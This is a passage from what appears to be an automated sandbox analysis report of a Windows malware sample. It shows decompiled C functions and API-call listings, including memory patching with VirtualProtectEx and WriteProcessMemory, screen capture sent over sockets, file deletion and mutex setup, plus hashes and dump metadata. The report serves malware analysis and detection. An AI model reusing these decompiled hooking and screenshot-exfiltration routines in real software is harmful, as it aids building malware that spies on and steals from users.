      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041EA2D
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0041EA37
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0041EA43
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041EA4F
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041EA5B
      • Part of subcall function 0041E910: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0041EA67
    • HeapAlloc.KERNEL32(?,00000008,?,?,?), ref: 0041EF0C
    • send.WS2_32(?,00000000,?,00000000), ref: 0041EF49
    • HeapFree.KERNEL32(?,00000000,00000000,?,?), ref: 0041EF5E
    • send.WS2_32(?,00000000), ref: 0041EF87
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$LibraryLoad$Heapsend$AllocFreeProtectVirtual
    • String ID:
    • API String ID: 3594632292-0
    • Opcode ID: 6d95dc7a3ce484bc43714ece189c22360f8675275d592343b8b07197da4622e6
    • Instruction ID: 3293d0f0a0844492b0d24ae2373d9b728b267af3931682051a70ed358ee0b2da
    • Opcode Fuzzy Hash: 6d95dc7a3ce484bc43714ece189c22360f8675275d592343b8b07197da4622e6
    • Instruction Fuzzy Hash: 9B217C7A240305BFD314DB15CC44FAB77A9FB98B18F048519FE899B290D634E905CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041E400(intOrPtr __eax, void* __edx) {
    				void* _t24;
    				void* _t29;
    				char _t35;
    				intOrPtr _t38;
    				void** _t45;
    				void* _t48;
    				signed int _t51;
    				void* _t54;
    
    				 *((char*)(_t54 + 3)) = 1;
    				if(__eax == 0) {
    					return 1;
    				} else {
    					_t45 = __edx + 8;
    					 *((intOrPtr*)(_t54 + 0x18)) = __eax;
    					do {
    						_t24 =  *_t45;
    						 *(_t54 + 0x1c) = _t24;
    						if(_t24 != 0) {
    							_t48 =  *(_t45 - 8);
    							_t51 = _t45[1] & 0x000000ff;
    							_t35 = 0;
    							if(VirtualQueryEx(0xffffffff, _t48, _t54 + 0x24, 0x1c) == 0 ||  *((intOrPtr*)(_t54 + 0x30)) != 0x1000 || ( *(_t54 + 0x34) & 0x00000101) != 0) {
    								L12:
    								 *((char*)(_t54 + 0x13)) = 0;
    							} else {
    								_t38 =  *((intOrPtr*)(_t54 + 0x2c));
    								_t29 = _t48 -  *((intOrPtr*)(_t54 + 0x20));
    								if(_t38 <= _t29 || _t38 - _t29 < 0x1e || VirtualProtectEx(0xffffffff, _t48, 0x1e, 0x40, _t54 + 0x14) == 0) {
    									goto L12;
    								} else {
    									if(WriteProcessMemory(0xffffffff, _t48,  *(_t54 + 0x1c), _t51 + 0xfffffffb, 0) != 0) {
    										_t35 = 1;
    									}
    									VirtualProtectEx(0xffffffff, _t48, 0x1e,  *(_t54 + 0x14), _t54 + 0x14);
    									if(_t35 == 0) {
    										goto L12;
    									}
    								}
    							}
    						}
    						_t45 =  &(_t45[4]);
    						_t19 = _t54 + 0x18;
    						 *_t19 =  *((intOrPtr*)(_t54 + 0x18)) - 1;
    					} while ( *_t19 != 0);
    					return  *((intOrPtr*)(_t54 + 0x13));
    				}
    			}












    APIs
    • VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000000,00000000,00000000,00000034,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041E441
    • VirtualProtectEx.KERNEL32(000000FF,?,0000001E,00000040,?), ref: 0041E480
    • WriteProcessMemory.KERNEL32(000000FF,?,?,?,00000000), ref: 0041E498
    • VirtualProtectEx.KERNEL32(000000FF,?,0000001E,?,?), ref: 0041E4B3
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Virtual$Protect$MemoryProcessQueryWrite
    • String ID:
    • API String ID: 2789181485-0
    • Opcode ID: 7a0c03d3d6e79830e399005db06f5ec813b91e252e59d85571f7593f1b7d7b02
    • Instruction ID: 5087ebbf1e5c8b032eb83d5e504447726f074ccf0d69ba90f81f4e95aab1426b
    • Opcode Fuzzy Hash: 7a0c03d3d6e79830e399005db06f5ec813b91e252e59d85571f7593f1b7d7b02
    • Instruction Fuzzy Hash: A721D6352043526BD710CA26DD44AEBBBD8AB85760F440B19FDE4972D0D378D988C7AA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E0040B280(WCHAR* __ecx, void* __edx, void* __edi) {
    				void* __esi;
    				void* __ebp;
    				WCHAR* _t16;
    				void* _t18;
    				void* _t24;
    				void* _t28;
    				WCHAR* _t30;
    				signed int _t39;
    				void* _t40;
    				void* _t41;
    				short _t47;
    				WCHAR* _t49;
    
    				_t40 = __edi;
    				_t30 = __ecx;
    				_t16 = __edx + 0x2c;
    				if(_t16 == 0) {
    					L5:
    					_t18 = PathCombineW( &(_t49[4]), _t30, _t16);
    					__eflags = _t18;
    					if(_t18 == 0) {
    						L17:
    						return 1;
    					}
    					_t47 = _t49[0x108];
    					__eflags =  *_t47 & 0x00000002;
    					if(__eflags == 0) {
    						L15:
    						__eflags =  *_t47 & 0x00000001;
    						if(( *_t47 & 0x00000001) != 0) {
    							SetFileAttributesW( &(_t49[2]), 0x80);
    							DeleteFileW(_t49);
    						}
    						goto L17;
    					}
    					_t28 = E0040B060( &(_t49[4]), _t40, _t47, __eflags);
    					__eflags = _t28;
    					if(_t28 == 0) {
    						L14:
    						goto L15;
    					}
    					_push(_t40);
    					_t41 = 0;
    					__eflags =  *_t28;
    					if( *_t28 == 0) {
    						L11:
    						_t44 = _t47 + 4;
    						_t24 = E00410740( *(_t47 + 8) + _t41, _t47 + 4);
    						__eflags = _t24;
    						if(_t24 != 0) {
    							E00410820( *(_t47 + 8) +  *_t44, _t28, _t41);
    							_t11 = _t47 + 8;
    							 *_t11 =  *(_t47 + 8) + _t41;
    							__eflags =  *_t11;
    						}
    						HeapFree( *0x42e6d4, 0, _t28);
    						goto L14;
    					}
    					do {
    						_t41 = _t41 + 1;
    						__eflags =  *((char*)(_t41 + _t28));
    					} while ( *((char*)(_t41 + _t28)) != 0);
    					goto L11;
    				}
    				while(1) {
    					_t39 =  *_t16 & 0x0000ffff;
    					if(_t39 != 0x5c && _t39 != 0x2f) {
    						goto L5;
    					}
    					_t16 =  &(_t16[1]);
    				}
    				goto L5;
    			}
















    APIs
    • PathCombineW.SHLWAPI(?,?,?), ref: 0040B2A9
    • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 0040B312
    • SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 0040B32C
    • DeleteFileW.KERNEL32(?,?,?), ref: 0040B336
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: File$AttributesCombineDeleteFreeHeapPath
    • String ID:
    • API String ID: 2744584418-0
    • Opcode ID: 0fa31b30016dc17c23a1a45a2b8e580b32f8b73560c6130c8aab377b192498ea
    • Instruction ID: 9aed8ab239d8485c5d08dcf305e0590ef5dcced0a6a5fb5090f95e4ab1efcc91
    • Opcode Fuzzy Hash: 0fa31b30016dc17c23a1a45a2b8e580b32f8b73560c6130c8aab377b192498ea
    • Instruction Fuzzy Hash: C5213271100308ABDB209F21CC88BAF3B98EF91344F04843EF855AA2D2D738D882C79C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040F794(void* __eax, short _a4, char _a442) {
    				short _v4;
    				void* _t24;
    				WCHAR* _t28;
    				int _t29;
    				signed int _t30;
    				WCHAR* _t31;
    				signed char _t36;
    				signed char _t40;
    				signed int _t45;
    				int _t48;
    				void* _t50;
    
    				_t24 = __eax;
    				while(1) {
    					_t36 =  *((intOrPtr*)(_t24 + 0x42eb70));
    					_t40 =  *((intOrPtr*)(_t50 + _t24 + 0xa8));
    					if(_t36 != _t40) {
    						break;
    					}
    					_t24 = _t24 + 1;
    					if(_t24 < 0x10) {
    						continue;
    					} else {
    						L5:
    						_t28 =  *0x42e954;
    						_t45 = 0;
    						if(_t28 != 0 &&  *_t28 != 0) {
    							do {
    								_t45 = _t45 + 1;
    							} while (_t28[_t45] != 0);
    						}
    						_t48 = 0;
    						if( *0x42e958 != 0) {
    							do {
    								_t48 = _t48 + 1;
    							} while (0x42e958[_t48] != 0);
    						}
    						_t29 = 0;
    						if(_a442 != 0) {
    							do {
    								_t29 = _t29 + 1;
    							} while ( *((char*)(_t50 + _t29 + 0x1be)) != 0);
    						}
    						_t30 = MultiByteToWideChar(0, 0,  &_a442, _t29,  &_a4, 0x14);
    						if(_t30 >= 0x14) {
    							_t30 = 0;
    						}
    						 *((short*)(_t50 + 8 + _t30 * 2)) = 0;
    						if(_t45 <= _t48) {
    							L22:
    							return 0;
    						} else {
    							_t31 =  *0x42e954;
    							if(_t31[_t48] != 0x5c || StrCmpNIW(0x42e958, _t31, _t48) != 0 || lstrcmpiW( &_v4,  *0x42e954 + 2 + _t48 * 2) != 0) {
    								goto L22;
    							} else {
    								return 1;
    							}
    						}
    					}
    					L23:
    				}
    				if((_t36 & 0x000000ff) != (_t40 & 0x000000ff)) {
    					goto L22;
    				} else {
    					goto L5;
    				}
    				goto L23;
    			}















    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000014,?,00000000,000001E6,?,0042EB80,000001E6,?,?,00000102,0042EB80), ref: 0040F82F
    • StrCmpNIW.SHLWAPI(0042E958,?,C4815E01,?,00000000,?,?,00000016,?,?,00000000), ref: 0040F85B
    • lstrcmpiW.KERNEL32(?,?,?,00000016,?,?,00000000), ref: 0040F875
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ByteCharMultiWidelstrcmpi
    • String ID: u5VPhXB
    • API String ID: 1977948566-1119068662
    • Opcode ID: 4b43e575396729a55a51bb0537cf2cd1d528a164f7cf9cc0cbea9c675f2a9b67
    • Instruction ID: 6a7240792a6a24bb87d7d0d2e98e0b66d463106aa7d635942b5b74e9654a4ec4
    • Opcode Fuzzy Hash: 4b43e575396729a55a51bb0537cf2cd1d528a164f7cf9cc0cbea9c675f2a9b67
    • Instruction Fuzzy Hash: 8321D7316042419DE734A725DC44BB777E5BB85780F90887BD486E3AD1E77888CE839B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00410C40(char* __ebx, char** __edi, void* _a4) {
    				void* _t9;
    				signed int _t10;
    				void* _t12;
    				int _t14;
    				char* _t17;
    				long _t18;
    				char** _t25;
    				void* _t27;
    
    				_t25 = __edi;
    				_t17 = __ebx;
    				_t9 = 0;
    				if(__ebx != 0 &&  *__ebx != 0) {
    					do {
    						_t9 = _t9 + 1;
    					} while ( *((char*)(_t9 + __ebx)) != 0);
    				}
    				_t2 = _t9 + 5; // 0x6
    				_t27 = _t2;
    				while(1) {
    					_t27 = _t27 + 0x200;
    					_t3 = _t27 - 5; // -511
    					_t10 = _t3;
    					if(_t10 > 0xa00000) {
    						break;
    					}
    					_t12 =  *_t25;
    					_t4 = _t27 - 4; // -510
    					_t18 = _t4;
    					if(_t18 != 0) {
    						_push(_t27);
    						if(_t12 != 0) {
    							_t10 = HeapReAlloc( *0x42e6d4, 8, _t12, ??);
    						} else {
    							_t10 = HeapAlloc( *0x42e6d4, 8, ??);
    						}
    						if(_t10 == 0) {
    							break;
    						} else {
    							 *_t25 = _t10;
    							goto L15;
    						}
    					} else {
    						if(_t12 != 0) {
    							HeapFree( *0x42e6d4, _t18, _t12);
    						}
    						 *_t25 = 0;
    						L15:
    						_t6 = _t27 - 5; // -512
    						_t14 = wvnsprintfA( *_t25, _t6, _t17, _a4);
    						if(_t14 < 0) {
    							continue;
    						} else {
    							_t7 = _t27 - 6; // -513
    							if(_t14 >= _t7) {
    								continue;
    							} else {
    								( *_t25)[_t14] = 0;
    								return _t14;
    							}
    						}
    					}
    					L19:
    				}
    				return _t10 | 0xffffffff;
    				goto L19;
    			}












    APIs
    • HeapFree.KERNEL32(?,-000001FF,-00000200,00000000,77E49EB0,00411E8E,?,?,00000000,00000000,?,004078E8,?), ref: 00410C88
    • HeapAlloc.KERNEL32(?,00000008,-000001FB,00000000,77E49EB0,00411E8E,?,?,00000000,00000000,?,004078E8,?), ref: 00410CA3
    • HeapReAlloc.KERNEL32(?,00000008,-00000200,-000001FB,00000000,77E49EB0,00411E8E,?,?,00000000,00000000,?,004078E8,?), ref: 00410CB5
    • wvnsprintfA.SHLWAPI(?,-00000200,?,?), ref: 00410CCE
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Alloc$Freewvnsprintf
    • String ID:
    • API String ID: 630057495-0
    • Opcode ID: 020e7efc529a9a10a73c7966799eaa7eed9dff2dc0a2d0e09c41965c6cdc5a69
    • Instruction ID: e910a2a3723fe0276ef8b823eb73161f728320d5f02b6a1a8c37e1aa80f77de7
    • Opcode Fuzzy Hash: 020e7efc529a9a10a73c7966799eaa7eed9dff2dc0a2d0e09c41965c6cdc5a69
    • Instruction Fuzzy Hash: DE2142712002019FE728CB55DD84FA777A9AB64340F54462AE941DB291F7B4D9C1CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00423FB0(void* __ecx, void* __edx, void* __eflags) {
    				char _v3;
    				unsigned int _v128;
    				char _v804;
    				unsigned int _t8;
    				long _t11;
    				long _t15;
    				long _t16;
    				long _t17;
    				long _t29;
    				long _t35;
    				void* _t39;
    
    				_t39 = E0041CDD0(__eflags, 0x909011a5, 2);
    				if(_t39 != 0) {
    					E0041D150( &_v804);
    					_t8 = _v128;
    					_t29 = (_t8 & 0x0000ffff) * 0xea60;
    					_t35 = (_t8 >> 0x10) * 0xea60;
    					E00410870( &_v804,  &_v804, 0, 0x31c);
    					_t11 = WaitForSingleObject( *0x42edbc, 0);
    					__eflags = _t11;
    					if(_t11 != 0) {
    						do {
    							_t15 = E00423DA0(0);
    							__eflags = _t15;
    							_t16 = _t35;
    							if(_t15 == 0) {
    								_t16 = _t29;
    							}
    							_t17 = WaitForSingleObject( *0x42edbc, _t16);
    							__eflags = _t17 - 0x102;
    						} while (_t17 == 0x102);
    					}
    					ReleaseMutex(_t39);
    					CloseHandle(_t39);
    					__eflags = 0;
    					return 0;
    				} else {
    					_t1 =  &_v3; // 0x1
    					return _t1;
    				}
    			}















    APIs
      • Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
      • Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
      • Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39
    • WaitForSingleObject.KERNEL32(?,00000000,909011A5,00000000,0000031C,909011A5,00000002), ref: 00424023
    • WaitForSingleObject.KERNEL32(?,?,00000000), ref: 00424047
    • ReleaseMutex.KERNEL32(00000000), ref: 00424051
    • CloseHandle.KERNEL32(00000000), ref: 00424058
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ObjectSingleWait$CloseHandleMutex$CreateRelease
    • String ID:
    • API String ID: 270228696-0
    • Opcode ID: a2e6abad1cd5a8bd885f6be7e84c8dce7db3d5762f4b9a39810578a0e655f202
    • Instruction ID: db4623a186fb94fe5e0fec0959821e9de9bea0bb1aa5d6f6eb18c92868a0dc93
    • Opcode Fuzzy Hash: a2e6abad1cd5a8bd885f6be7e84c8dce7db3d5762f4b9a39810578a0e655f202
    • Instruction Fuzzy Hash: 1B11E73374421C5BD330AA99BC46FE7B75CE785350F80053BFA04D31D1D669A94086A9
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • select.WS2_32 ref: 004150FA
    • recv.WS2_32(00000000,?,00000400,00000000), ref: 00415141
    • send.WS2_32(?,?,00000000,00000000), ref: 0041515A
    • select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 0041518F
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: select$recvsend
    • String ID:
    • API String ID: 1283675226-0
    • Opcode ID: 159d10671631e970fd36d111d25f2d22f2270298a80e6d6dd62f4c6e117d3b36
    • Instruction ID: 2b5e02b864ae49c384870267722eb7457ec9471f6cb179a45722fcce497d2eb7
    • Opcode Fuzzy Hash: 159d10671631e970fd36d111d25f2d22f2270298a80e6d6dd62f4c6e117d3b36
    • Instruction Fuzzy Hash: 13218C72A44704BFD2209F10DD89BEFB7A5FBC4704F50492DF2859A290C2749984CF9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040ECC0() {
    				void* _t6;
    				void* _t9;
    				void* _t10;
    				void* _t12;
    
    				if( *0x42e7f0 < 0x40) {
    					if(E0040EAB0 == 0) {
    						L6:
    						_t12 = 1;
    						L7:
    						if( *0x42e7f0 < 0x40) {
    							if(E0040EB40 == 0) {
    								L13:
    								_t6 = 1;
    								L14:
    								if(_t12 != 0 || _t6 != 0) {
    									return 1;
    								} else {
    									return 0;
    								}
    							}
    							_t9 = CreateThread(0, 0, E0040EB40, 0, 0, 0);
    							if(_t9 != 0) {
    								 *(0x42e7f4 + ( *0x42e7f0 & 0x000000ff) * 4) = _t9;
    								 *0x42e7f0 =  *0x42e7f0 + 1;
    								goto L13;
    							}
    							_t6 = 0;
    							goto L14;
    						}
    						SetLastError(0x9b);
    						_t6 = 0;
    						goto L14;
    					}
    					_t10 = CreateThread(0, 0, E0040EAB0, 0, 0, 0);
    					if(_t10 != 0) {
    						 *(0x42e7f4 + ( *0x42e7f0 & 0x000000ff) * 4) = _t10;
    						 *0x42e7f0 =  *0x42e7f0 + 1;
    						goto L6;
    					}
    					_t12 = 0;
    					goto L7;
    				}
    				SetLastError(0x9b);
    				_t12 = 0;
    				goto L7;
    			}








    APIs
    • SetLastError.KERNEL32(0000009B,00000000,00000000,00000010,0041D684,0042E7F0,00000000,00000104), ref: 0040ECDD
    • CreateThread.KERNEL32 ref: 0040ECFB
    • SetLastError.KERNEL32(0000009B,00000000,00000000,00000010,0041D684,0042E7F0,00000000,00000104), ref: 0040ED29
    • CreateThread.KERNEL32 ref: 0040ED47
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateErrorLastThread
    • String ID:
    • API String ID: 1689873465-0
    • Opcode ID: 00a0ac704a9d0a68a76711654c655f9526b43a4901fc3e09fc3e03fca50423d5
    • Instruction ID: 649fe66f57757ce21a8e73f0fe2976c80e8039452ddb20686e5749908ba3b627
    • Opcode Fuzzy Hash: 00a0ac704a9d0a68a76711654c655f9526b43a4901fc3e09fc3e03fca50423d5
    • Instruction Fuzzy Hash: D61182B538435272EB3017372D12F622A44EB92B44F290CB7E681B72D5E2FE6423566D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E0041C780(void* __eax, signed char _a4) {
    				short _v520;
    				signed int _t16;
    				signed int _t17;
    				signed int _t19;
    				short* _t30;
    
    				_t30 =  &_v520;
    				if((_a4 & 0x00000001) != 0) {
    					L4:
    					_t16 = GetModuleFileNameW(0,  &_v520, 0x104);
    					if(_t16 == 0xffffffff) {
    						_t16 = 0;
    						if(_v520 != 0) {
    							do {
    								_t16 = _t16 + 1;
    							} while (_t30[_t16] != 0);
    						}
    					}
    					_t8 = _t16 + _t16 + 2; // 0x2
    					_t17 = _t8;
    					if(_t17 != 0) {
    						_t19 = HeapAlloc( *0x42e6d4, 8, _t17 + 4);
    						if(_t19 != 0) {
    							_t19 = E00410820(_t19,  &_v520, _t27);
    						}
    						 *0x42e954 = _t19;
    						return _t19 & 0xffffff00 | _t19 != 0x00000000;
    					} else {
    						 *0x42e954 = _t17;
    						return _t17 & 0xffffff00 | _t17 != 0x00000000;
    					}
    				} else {
    					__imp__SHGetFolderPathW(0, 0x1a, 0, 0, 0x42e958);
    					if(__eax == 0) {
    						PathRemoveBackslashW(0x42e958);
    						goto L4;
    					} else {
    						return 0;
    					}
    				}
    			}









    APIs
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,0042E958), ref: 0041C79D
    • PathRemoveBackslashW.SHLWAPI(0042E958), ref: 0041C7B7
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0041C7C9
    • HeapAlloc.KERNEL32(?,00000008,-00000002,00000000), ref: 0041C814
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$AllocBackslashFileFolderHeapModuleNameRemove
    • String ID:
    • API String ID: 3626861879-0
    • Opcode ID: 532cbc6d90fd4752e845776e459543a4e2f87c5fa0cf2a9a6e69e2194653e2ad
    • Instruction ID: b105a6255c463b67ff6f57ddc1b37d67a280c4cd082ec66d50b8c91d03caaec9
    • Opcode Fuzzy Hash: 532cbc6d90fd4752e845776e459543a4e2f87c5fa0cf2a9a6e69e2194653e2ad
    • Instruction Fuzzy Hash: 40113A717403016BE760A720DD8AFE773A8AB50700F00453AFA61E11E0E7B8C5D4C75E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E00410670(void* __ecx) {
    				WCHAR* _v4;
    				short _v528;
    				char _v648;
    				char _v680;
    				char _v684;
    				void* _v688;
    				void* __esi;
    				char* _t13;
    				void* _t22;
    				signed int _t26;
    
    				_t13 =  &_v680;
    				_t26 = 0;
    				__imp__ConvertSidToStringSidW(__ecx, _t13);
    				if(_t13 != 0) {
    					_t38 =  &_v648;
    					E00424100(4,  &_v648);
    					_push(_v688);
    					if(E00411D10( &_v648, 0x104,  &_v528, _t38) > 0) {
    						E00424100(5,  &_v684);
    						_t22 = E00416420(0x80000002,  &_v528,  &_v684, 0x104);
    						if(_t22 != 0 && _t22 != 0xffffffff) {
    							PathUnquoteSpacesW( &_v528);
    							_t26 = 0 | ExpandEnvironmentStringsW( &_v528, _v4, 0x104) - 0x00000001 - 0x00000103 < 0x00000000;
    						}
    					}
    					LocalFree(_v688);
    				}
    				return _t26;
    			}














    APIs
    • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 0041067F
    • LocalFree.KERNEL32(?,?,00000000), ref: 00410726
      • Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
      • Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
      • Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B
    • PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,?,00000000), ref: 004106F7
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,00000000), ref: 00410712
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseConvertEnvironmentExpandFreeLocalOpenPathQuerySpacesStringStringsUnquoteValue
    • String ID:
    • API String ID: 2962224238-0
    • Opcode ID: dc708aef3a6e9f64ac2ddfbf429aefba90b23ebbf203f0ebfffdabfd0c33c4e6
    • Instruction ID: 4e3aefb6fc1b8a5617357f4c4a0f98a70afb978300c6d886c4f6da98ef5de03e
    • Opcode Fuzzy Hash: dc708aef3a6e9f64ac2ddfbf429aefba90b23ebbf203f0ebfffdabfd0c33c4e6
    • Instruction Fuzzy Hash: B411CAB62042516BD710E754EC45BDB7799EB84300F10492EBA99D32A0D678E888CB66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00418160(WCHAR* __eax) {
    				char _v12;
    				void* _v16;
    				intOrPtr _v20;
    				void* _t5;
    				signed int _t10;
    				signed int _t11;
    				signed int _t16;
    				signed int _t17;
    				void* _t19;
    
    				_t17 = _t16 | 0xffffffff;
    				_t11 = _t10 | 0xffffffff;
    				_t5 = CreateFileW(__eax, 0x80000000, 7, 0, 3, 0, 0);
    				_t19 = _t5;
    				if(_t19 == 0xffffffff) {
    					L4:
    					return _t17;
    				} else {
    					__imp__GetFileSizeEx(_t19,  &_v12);
    					if(_t5 == 0) {
    						_t17 = _t17 | 0xffffffff;
    						_t11 = _t11 | 0xffffffff;
    						CloseHandle(_t19);
    						goto L4;
    					} else {
    						CloseHandle(_t19);
    						return _v20;
    					}
    				}
    			}













    APIs
    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,?,?,?,00000002), ref: 0041817C
    • GetFileSizeEx.KERNEL32(00000000,?), ref: 0041818F
    • CloseHandle.KERNEL32(00000000), ref: 004181A2
    • CloseHandle.KERNEL32(00000000), ref: 004181BA
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseFileHandle$CreateSize
    • String ID:
    • API String ID: 4148174661-0
    • Opcode ID: 26f61d1130ad3ae2372c5212903980dfa669dcbe708a56123cc2ebc63315b31e
    • Instruction ID: b833d8339958935815280c0238fc3e6f93ace4467e4aa781b361aa0eaa75c7d4
    • Opcode Fuzzy Hash: 26f61d1130ad3ae2372c5212903980dfa669dcbe708a56123cc2ebc63315b31e
    • Instruction Fuzzy Hash: BAF022367012102BE2106A2D9C49BDB3B58EBC5331F680329FE30F22E0D778680A81B9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00413040(void* __eax) {
    				void _v4;
    				long _v8;
    				void _v24;
    				long _v28;
    				int _t10;
    				void* _t11;
    				int _t12;
    				void* _t19;
    
    				_t19 = __eax;
    				_v8 = 4;
    				_t10 = InternetQueryOptionA(__eax, 0x15,  &_v4,  &_v8);
    				_t11 = InternetCloseHandle(_t19);
    				if(_t10 != 0) {
    					while(1) {
    						_t11 = _v24;
    						if(_t11 == 0) {
    							goto L3;
    						}
    						_v28 = 4;
    						_t12 = InternetQueryOptionA(_t11, 0x15,  &_v24,  &_v28);
    						_t11 = InternetCloseHandle(_t11);
    						if(_t12 != 0) {
    							continue;
    						}
    						goto L3;
    					}
    				}
    				L3:
    				return _t11;
    			}












    APIs
    • InternetQueryOptionA.WININET ref: 00413064
    • InternetCloseHandle.WININET(00000000), ref: 0041306F
    • InternetQueryOptionA.WININET(?,00000015,?,?), ref: 00413094
    • InternetCloseHandle.WININET(?), ref: 00413099
    Memory Dump Source
